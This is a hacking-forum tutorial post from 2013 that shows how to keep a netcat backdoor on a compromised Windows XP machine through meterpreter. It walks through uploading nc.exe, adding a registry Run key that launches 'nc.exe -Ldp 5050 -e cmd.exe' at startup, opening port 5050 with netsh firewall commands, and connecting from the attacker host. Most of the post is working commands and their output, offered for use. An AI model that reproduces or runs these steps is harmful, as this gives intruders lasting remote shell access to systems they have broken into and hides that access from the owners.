+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: Persistent Netcat Backdoor With Metasploit (/Thread-Persistent-Netcat-Backdoor-With-Metasploit)
Persistent Netcat Backdoor With Metasploit - LEGITimacy™ - 01-21-2013
Hello Hack Community, Today we will be installing a netcat backdoor on a compromised system and making the backdoor persistent by interacting with the system registry and firewall. :yeye:
First Lets Upload netcat onto the compromised system using our meterpreter.
PHP Code:
meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading : /tmp/nc.exe -> C:\windows\system32
[*] uploaded : /tmp/nc.exe -> C:\windows\system32nc.exe
Next we want to make netcat listen on a random port (port 5050) and bypass the system firewall, and open up the port on startup. We will do this by using the "reg enumkey" command and editing the 'HKLM\software\microsoft\windows\currentversion\run' key.
PHP Code:
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (3):
VMware Tools
VMware User Process
quicktftpserver
Next we use the "reg setval" & "reg queryval" commands to get netcat to run on startup and open port 5050 and listen for a connection.
PHP Code:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 5050 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 5050 -e cmd.exe
Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor using an interactive command prompt and running the "netsh" command, and to see if operational mode is enabled on the firewall configuration.
PHP Code:
meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ > netsh firewall show opmode
Netsh firewall show opmode
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode = Enable
As shown above operational mode is enabled on the firewall configuration :yeye:So next lets open up port 5050 and then use netcat to connect to it :3
PHP Code:
C:\ > netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 5050 "NETCAT BACKDOOR" ENABLE ALL
Ok.
C:\ > netsh firewall show portopening
netsh firewall show portopening
Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
5050 TCP Enable NETCAT BACKDOOR
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
CONNECTING TO THE BACKDOOR:
PHP Code:
root@bt:~# nc -v 192.168.56.60 5050
And there you have it. A Persistent Netcat Backdoor :3 Thanks for viewing my TUT!